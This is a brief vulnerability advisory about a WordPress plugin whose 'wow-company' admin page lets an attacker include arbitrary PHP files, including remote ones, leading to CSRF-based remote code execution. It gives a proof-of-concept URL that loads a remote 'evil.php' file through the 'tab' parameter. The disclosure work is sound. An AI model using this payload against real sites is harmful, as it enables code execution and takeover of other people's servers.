The plugin within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.
http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab;=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP’s allow_url_include must be set to “On”